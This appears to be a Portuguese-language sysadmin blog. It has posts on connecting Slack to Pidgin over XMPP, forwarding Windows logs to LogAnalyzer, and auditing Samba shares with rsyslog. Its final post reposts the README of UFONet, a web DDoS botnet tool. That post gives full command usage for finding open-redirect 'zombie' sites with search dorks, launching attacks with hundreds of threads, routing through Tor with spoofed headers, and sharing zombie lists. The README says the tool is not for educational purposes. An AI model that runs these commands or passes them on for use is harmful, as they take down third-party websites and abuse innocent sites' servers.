sábado, maio 28, 2016

, , ,

slack+pidgin+linux = (L)



Hello Modafokers! 
O que é o slack? 
O Slack é um app gratuito para Android e iOS, que oferece um ambiente no qual pode se comunicar com equipes através de mensagens de texto, voz, enviando vídeos e documentos, tendo absolutamente tudo organizado e registrado. O conteúdo das conversas fica disponível somente entre os membros e é possível ver quem já visualizou sua publicação etc..  
A empresa, lançada há um ano, cresce sua receita na taxa de US$ 1 milhão a cada 11 dias com um produto simples: chat corporativo via internet. possui alguns canais e integração de apps etc....  bom agora que você sabe o que é o slack, vamos as configurações do pidgin :) 

Linux+pidgin 

1- Baixar Pidgin em: https://www.pidgin.im/
2- Instale Pidgin e prossiga com as configurações abaixo.
3- acesse seu gateway no canal https://owasp.slack.com/account/gateways onde OWASP é nome do canal a qual participo OK?  salve os dados dessa tela que sera algo como isto. 

e vamos para o pidgin :D 
na aplicação vamos fazer o seguinte passo: 
* Contas -> Gerenciar Contas -> Adicionar
* Tipo: XMPP
* Nome de usuário: [o usuário listados aqui: https://owasp.slack.com/account/gateways]
* Domínio: owasp.xmpp.slack.com
* Recurso: deixar em branco
* Password: senha listada na https://owasp.slack.com/account/gateways
* Verifique lembrar senha
* Clique em Adicionar.

Em seguida, o programa de configuração da sala de chat "geral" Pidgin (este é o quarto que todos conversar em conjunto):
* Buddies -> Adicionar bate-papo
* Conta (yourusername@owasp.xmpp.slack.com) (escolher suspenso)
* Sala: general
* Servidor: conference.owasp.xmpp.slack.com
* Punho: seu nome de usuário folga
* Senha: sua senha a partir daqui: https://owasp.slack.com/account/gateways
* Clique na caixa onde se lê "autojoin quando se conecta conta"
* Clique na caixa "permanecem no bate-papo após a janela está fechada"
* Clique em "Adicionar"
e pronto! :D 
- agora posso acessar o slack pelo pidgin diretamente , ou usar seu cliente "nativo" ou pelo navegador. 
see ya! 

terça-feira, janeiro 26, 2016

, , ,

Centralizador de log's com loganalyser


Hello Modafokers! 

- Dando continuidade ao post anterior sobre auditoria de compartilhamentos, iremos explanar neste post algumas configurações para comunicação do seu cliente Windows com o servidor loganalyser, para isso iremos imaginar o seguinte ambiente. 

SRV-LOG: Servidor Rsyslog+loganalyser. 
Clientes: Estações de trabalho Window$. 
Agent: http://www.syslogserver.com/syslogagent.html // http://www.winsyslog.com/en/ 
Obs: Eu recomendo os agent's do syslogserver por que a do winsyslog e trial. :) 

Vamos lá  com seu servidor de log pronto e já configurado para receber os dados suponhamos que seu servidor do loganalyser seja o endereço : 192.168.0.120 , e a estação de trabalho que você esta monitorando seja 192.168.0.130 ok? então temos: 

Servidor log : 192.168.0.120
Cliente com agent: 192.168.0/24 

Na pagina do syslogserver faça download dos agent's de 32 e 64 bits, é importante que você ja deixe os dois baixados para economizar tempo caso você nao saiba qual arquitetura esta a sua maquina Window$ da qual deseja monitorar. 

http://www.syslogserver.com/download.html 
descompacte em c:\ da estação de trabalho windows e veras alguns arquivos como este: 

EXECUTE COMO ADMINISTRADOR o arquivo : SyslogAgentConfig e você vai cair em uma tela como esta: 


192.168.0.120 = Servidor para onde cliente irá mandar os log's filtrados. 
514 = porta do serviço da qual envia logs para o servidor. 
Enable forwarding of event logs: application / 562,565,566,836 = esta configuração iŕa pegar apenas os registros do windows que possuem as numerações 562,565,566,836 que forem emitidas por uma aplicação. 
Application logs: IIS nome do serviço da qual deseja ser monitorado. 
Obs: nos testes que realizei por exemplo em "event logs" você pode colocar somente application ele irá trazer todos os registros.  


Explanação
Esta aplicação é responsavel por coletar os filtros de log e enviar para servidor. 

Como ele funciona? 
você seta em SyslogAgentConfig todos os parâmetros que necessita monitorar e esta aplicação pega as config's que você setou e coloca em SyslogAgent.exe que instala como serviço na estação de trabalho do cliente, por isso é importante executar o SyslogAgentConfig como administrador. 
pode crer? :)  Você terá resultado como este, já com todos os log's sendo enviado para seu servidor loganalyser. 



quinta-feira, janeiro 21, 2016

, , , ,

Auditando Compartilhamentos com Loganalyser + Rsyslog.

Hello modafokers!!!
Hoje vou resumir neste post,uma forma simples de realizar um centralizador de log's e filtrando acessos a compartilhamentos seja Window$ ou linuX :) Para isso vamos imaginar o seguinte cenário onde nosso Objetivo é receber LOG'S de acesso de uma determinada rede ou Estação de Trabalho, consequentemente podendo filtrar pesquisa a outros recursos da maquina em nosso caso compartilhamento.


 Laboratorio:
* Servidor linux: Fileserver ( Servidor de Arquivos Samba )
* Servidor linux: SRV-Auditoria ( Loganalyser+Mysql+PHP+Rsyslog)
* Clientes Window$ e Linux.

DevOp's:

Para estudar o recebimento dos log's  foi realizado a seguinte organização lógica.
Servidor Auditoria: 192.168.25.9
Servidor de Arquivos Samba: 192.168.25.9
Clientes Maquinas: 192.168.25.0/24 

Obs: esta rece foi montada sem regras de FIREWALL, abaixo vou listar as portas que são importantes para determinados serviços se comunicarem, caso possua um Fw em sua rede deverá realizar a abertura das seguintes portas: http: 80 / Mysql: 3306 / smb: 445 / Rsyslog: 514. firmeza?  depois que você conferir regras de comunicação entre as maquinas, sem delongas  a ordem de execução das atividades:
Obs: em meu caso coloquei o servidor de log (loganalyser) no mesmo servidor onde se encontra os arquivos, mas isto fica a seu critério ok? :
1- Instalando Servidor LAMP
No MEU CASO optei pela distribuição Debian, onde fiz a instalação do LAMP , SAMBA ,Rsyslog no mesmo servidor. 

2- Instalando SAMBA

em seu servidor crie dentro da "home"  uma pasta MAE chamada Empresa e dentro dela insira 2 setores  administrativo e outro o financeiro. a Pasta Empresa será diretório matriz para organização das subpastas. 

Grupos: grupo de permissão de acesso a pasta.
Usuarios:  serão usuarios a acessar compartilhamento.
Setores: os setores da empresa aqui serão as pastas compartilhadas.


no rootshell do servidor digite:
$ Groupadd  administrativo
$ Groupadd  financeiro

no rootshell do servidor digite:
$ adduser kembolle
$ adduser Cliente   


agora temos que criar os 2 usuarios no samba tambem para acessar os compartilhamentos.

no rootshell do servidor digite:
$ smbpasswd -a kembolle
$ smbpasswd -a cliente  

agora vamos setar permissões de acesso onde kembolle acessa a pasta financeira e o cliente a pasta administrativa . a lógica é a seguinte: 
 chown [opção] [usuário dono].[grupo que acessa] [diretório/pasta] 

no rootshell do servidor digite:
$ chown kembolle.administrativo /home/empresa/administrativo
$ chown cliente.financeiro /home/empresa/financeiro


então temos administrativo e financeiro criados!!!! Homes, print$ , public são padrões dentro de smb.conf que você pode desabilita-los. 





agora com os compartilhamentos funcionando perfeitamente e testado a permissão dos usuarios vamos realizar a configuração do rsyslog para monitorar este diretório compartilhado neste momento temos um Jump the CAT :D 
" o parâmetro    vfs object = full_audit deve ser inserido na propriedade do compartilhamento em SMB.conf " 
por exemplo: 
# Compartilhamentos Empresa . 
[Financeiro]
    comment = Financeiro
    path = /home/empresa/financeiro
    read only = no
    browseable = yes
    writeable = yes
    valid users = @kembolle
    force group = financeiro
    force create mode = 0770
    force directory mode = 0770
    vfs object = full_audit

firmeza? se quiser conhecer mais sobre o recurso full_audit  e demais configurações avançadas no samba,você pode consultar aqui para maiores informações. :) 

3- Instalando o RSYSLOG 

Antes de mais nada instale o pacote chamado rsyslog-mysql, que irá solicitar integração com SGDB syslog criando 2 tabelas : SystemEvents, SystemEventsProperties conforme print abaixo: 

no rootshell do servidor digite:
$ sudo aptitude install rsyslog-mysql 



Um ótimo tutorial explicando a instalação do Rsyslog server é a do Tecadmi.net é necessario para que o Loganalyser receba os as mensagens você habilitar as portas e serviços do recurso que se encontra em /etc/rsyslog.conf .

# provides UDP syslog reception
# $ModLoad imudp
# $UDPServerRun 514

# provides TCP syslog reception
$ModLoad imtcp
$InputTCPServerRun 514
# $ModLoad imudp
# $UDPServerRun 514

APAGUE as tralhas em vermelho #, e insira as linhas abaixo:

# Auditoria enviada para  loganalyser
vfs objects = full_audit
full_audit:success = open, opendir, write, unlink, rename, mkdir, rmdir, chmod, chown
full_audit:prefix = %u|%I|%S
full_audit:failure = none
full_audit:facility = local5
full_audit:priority = notice

# Auditoria SMB
local5.notice /var/log/samba-full_audit.log

e por fim, onde tiver  #*.*;auth,authpriv.none         -/var/log/syslog  
mude para *.*;local5,auth,authpriv.none           -/var/log/syslog

 e salve o arquivo rsyslog.conf. pronto passo é reiniciar o serviço. 
no rootshell do servidor digite:
$ service rsyslog restart
$service rsyslog status



2º Instalando e configurando Loganalyser 
Melhor tutorial que achei sobre a instalação do Loganalyser, é a do Tecadmi.net . 
neste ponto se você fez a instalação corretamente do Loganalyser com certeza você irá cair no painel de administração e já conseguirá visualizar os Log's sendo recebidos. 

Print: Em nosso exemplo temos uma estação de trabalho windows acessando compartilhamento linux e os dados sendo registrados pelo loganalyser.

Sem Usuarios: 

Com Usuarios: 


Em um proximo tutorial vou apresentar como receber log's de estações de trabalho windows com o Loganalyser. forte abraço []'s (: 
Fontes: 
* http://www.profissionaisti.com.br/2015/09/auditoria-e-rotacionamento-de-logs-em-servidores-de-arquivos-linux/
* http://wiki.fabriciovc.eti.br/doku.php/linux/artigos/samba-fullaudit
* http://rareboucas.blogspot.com.br/2010/10/auditoria-de-acesso-no-samba-no-linux.html

domingo, novembro 29, 2015

domingo, novembro 08, 2015

,

UFONet - DDoS Botnet via Web Abuse


  
 ====================================================================== 
  UFONet - DDoS Botnet via Web Abuse 
======================================================================
  • Project info:
UFONet - is a free software tool designed to test DDoS attacks against a target using 'Open Redirect' vectors on third party web applications like botnet. + See this links for more info: - CWE-601:Open Redirect - OWASP:URL Redirector Abuse

UFONet abuses OSI Layer 7-HTTP to create/manage 'zombies' and to conduct different attacks using; GET/POST, multithreading, proxies, origin spoofing methods, cache evasion techniques, etc.


[!]Remember: this tool is NOT for educational purpose. Usage of UFONet for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.


  • Download:
  Current version: v0.6 - Galactic Offensive!   

git clone https://github.com/epsylon/ufonet

+ Packages: - UFONet-v0.6(.zip) (md5:f6be802f76e40b7dfd06075bfc616e39) - torrent - UFONet-v0.6(.tar.gz) (md5:40ca8242475a72dc99c139309fe9055c) - torrent -------------------------------- + Previous: - UFONet-v0.5b(.tar.gz) (md5:775f13baefb9241142c377f8519506f7)

  • Installing:
 UFONet runs on many platforms.  It requires Python (2.x.y) and the following libraries:

       python-pycurl - Python bindings to libcurl
       python-geoip  - Python bindings for the GeoIP IP-to-country resolver library
  On Debian-based systems (ex: Ubuntu), run: 
       sudo apt-get install python-pycurl python-geoip

  Source libs:
       * Python | * PyCurl | * PyGeoIP 

  • Usage:
Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -v, --verbose         active verbose on requests
  --update              check for latest stable version
  --check-tor           check to see if Tor is used properly
  --force-yes           set 'YES' to all questions
  --disableisup         disable external check of target's status
  --gui                 run GUI (UFONet Web Interface)

  *Configure Request(s)*:
    --proxy=PROXY       Use proxy server (tor: 'http://127.0.0.1:8118')
    --user-agent=AGENT  Use another HTTP User-Agent header (default SPOOFED)
    --referer=REFERER   Use another HTTP Referer header (default SPOOFED)
    --host=HOST         Use another HTTP Host header (default NONE)
    --xforw             Set your HTTP X-Forwarded-For with random IP values
    --xclient           Set your HTTP X-Client-IP with random IP values
    --timeout=TIMEOUT   Select your timeout (default 10)
    --retries=RETRIES   Retries when the connection timeouts (default 1)
    --threads=THREADS   Maximum number of concurrent HTTP requests (default 5)
    --delay=DELAY       Delay in seconds between each HTTP request (default 0)

  *Search for 'Zombies'*:
    -s SEARCH           Search from a 'dork' (ex: -s 'proxy.php?url=')
    --sd=DORKS          Search from a list of 'dorks' (ex: --sd 'dorks.txt')
    --sn=NUM_RESULTS    Set max number of results for engine (default 10)
    --se=ENGINE         Search engine to use for 'dorking' (default: duck)
    --sa                Search massively using all search engines

  *Test Botnet*:
    -t TEST             Update 'zombies' status (ex: -t 'zombies.txt')
    --attack-me         Order 'zombies' to attack you (NAT required!)

  *Community*:
    --download-zombies  Download 'zombies' from Community server: Turina
    --upload-zombies    Upload your 'zombies' to Community server: Turina
    --blackhole         Create a 'blackhole' to share your 'zombies'
    --up-to=UPIP        Upload your 'zombies' to a 'blackhole'
    --down-from=DIP     Download your 'zombies' from a 'blackhole'

  *Research Target*:
    -i INSPECT          Search for biggest file (ex: -i 'http://target.com')

  *Configure Attack(s)*:
    --disable-aliens    Disable 'aliens' web abuse of test services
    --disable-isup      Disable check status 'is target up?'
    -r ROUNDS           Set number of rounds (default: 1)
    -b PLACE            Set place to attack (ex: -b '/path/big.jpg')
    -a TARGET           Start Web DDoS attack (ex: -a 'http(s)://target.com')

  • Searching for 'zombies':
  UFONet can dig on different search engines results to find possible 'Open Redirect' vulnerable sites. 
  A common query string should be like this:

        'proxy.php?url='
        'check.cgi?url='
        'checklink?uri='
        'validator?uri='

  For example you can begin a search with:
       ./ufonet -s 'proxy.php?url='

  Or providing a list of "dorks" from a file:
       ./ufonet --sd 'dorks.txt'

  By default UFONet will uses a search engine called 'duck'. But you can choose a different one:
       ./ufonet -s 'proxy.php?url=' --se 'bing'

  This is the list of available search engines with last time that were working:
        - duck [07/10/2015: OK!]
        - google [07/10/2015: OK!]
        - bing [07/10/2015: OK!]
        - yahoo [07/10/2015: OK!]
        - yandex [07/10/2015: OK!]

  You can also search massively using all search engines supported:
       ./ufonet -s 'proxy.php?url=' --sa 

  To control how many 'zombies' recieve from search engines you can use:
       ./ufonet --sd 'dorks.txt' --sa --sn 20

  At the end of the process, you will be asked if you want to check the list retrieved to see 
  if the urls are vulnerable.
       Wanna check if they are valid zombies? (Y/n)

  Also, you will be asked to update the list adding automatically only 'vulnerable' web apps.
       Wanna update your list (Y/n)

  If you reply 'Y' your new 'zombies' will be appended to the file named: zombies.txt

  -------------
  Examples:
     + with verbose:     ./ufonet -s 'proxy.php?url=' -v
     + with threads:     ./ufonet --sd 'dorks.txt' --sa --threads 100


  • Testing botnet:
  Open 'zombies.txt' (or another file) and create a list of possible 'zombies'. 
  Urls of the 'zombies' should be like this:

       http://target.com/check?uri=

  After that, launch it:

       ./ufonet -t zombies.txt

  You can order to 'zombies' to attack you and see how they reply to your needs using:

       ./ufonet --attack-me 

  At the end of the process you will be asked if you want to update the list 
  adding automatically only 'vulnerable' web apps.

       Wanna update your list (Y/n)

  If you reply 'Y', your file: zombies.txt will be updated.

  -------------
  Examples:

     + with verbose:     ./ufonet -t zombies.txt -v
     + with proxy TOR:   ./ufonet -t zombies.txt --proxy="http://127.0.0.1:8118"
     + with threads:     ./ufonet -t zombies.txt --threads 50


  • Inspecting a target:
  This feature will provides you the biggest file on target:

       ./ufonet -i http://target.com

  You can use this when attacking to be more effective:

       ./ufonet -a http://target.com -b "/biggest_file_on_target.xxx"

  -------------
  Example:

    +input:

       ./ufonet -i http://target.com

    +output:

       [...]

        +Image found: images/wizard.jpg
 (Size: 63798 Bytes)
 ------------
 +Style (.css) found: fonts.css
 (Size: 20448 Bytes)
 ------------
 +Webpage (.php) found: contact.php
 (Size: 2483 Bytes)
 ------------
 +Webpage (.php) found: about.php
 (Size: 1945 Bytes)
 ------------
 +Webpage (.php) found: license.php
 (Size: 1996 Bytes)
 ------------
 ================================================================================
 =Biggest File: http://target.com/images/wizard.jpg
 ================================================================================


  • Attacking a target:
  Enter a target to attack with a number of rounds:

       ./ufonet -a http://target.com -r 10

  On this example UFONet will attacks the target a number of 10 times for each 'zombie'. That means that 
  if you have a list of 1.000 'zombies' it will launchs 1.000 'zombies' x 10 rounds = 10.000 requests 
  to the target.

  By default if you don't put any round it will apply only 1.

  Additionally, you can choose a place to recharge on target's site. For example, a large image, 
  a big size file or a flash movie. In some scenarios where targets doesn't use cache systems 
  this will do the attack more effective.

       ./ufonet -a http://target.com -b "/images/big_size_image.jpg"

  -------------
  Examples:

     + with verbose:     ./ufonet -a http://target.com -r 10 -v
     + with proxy TOR:   ./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:8118"
     + with a place:     ./ufonet -a http://target.com -r 10 -b "/images/big_size_image.jpg"
     + with threads:     ./ufonet -a http://target.com -r 10 --threads 500


  • Updating:
  UFONet implements an option to update the tool to the latest stable version.
  This feature can be used only if you have cloned it from GitHub repository

  To check your version you should launch:

       ./ufonet --update

  This will update the tool automatically, removing all files from your old package.


  • GUI/Web Interface:
  You can manage UFONet using a Web interface. The tool has implemented a python web server
  connected to the core, to provides you a more user friendly experience.

  

  To launch it, use:

      ./ufonet --gui

  This will open a tab on your default browser with all features of the tool and some 'extra' options.

  


  • Generating 'Blackhole':
  UFONet has some P2P options to share/keep 'zombies' with other 'motherships'.
      
  * Setup web server with a folder "ufonet", this folder should be: 

    - located in /var/www/ufonet (default debian/ubuntu install)
    - owned by the user running the blackhole
    - accessible with http://your-ip/ufonet/

  * Start the blackhole with: ./ufonet --blackhole (or python2 blackhole.py)

  * Anyone wanting to connect to your server needs to set the --up-to/--down-from 
    to the ip address of your webserver...

  [!]WARNING : this *ADVANCED* function is *NOT* secure, proceed if you really want to.

  -------------
  Examples:

   + Starting 'blackhole' server: ./ufonet --blackhole

  
 

  • Contribute:
  If you want to contribute to UFONet development, reporting a bug, providing a patch, commenting 
  on the code base or simply need to find help to run it, please go to:

    + Wormhole: irc.freenode.net / channel: #ufonet

  If nobody gets back to you, then drop me an e-mail.

  To make donations use the following hashes:
  
      - Bitcoin: 1Q63KtiLGzXiYA8XkWFPnWo7nKPWFr3nrc
      - Ecoin: 6enjPY7PZVq9gwXeVCxgJB8frsf4YFNzVp
 
fonte: http://ufonet.03c8.net/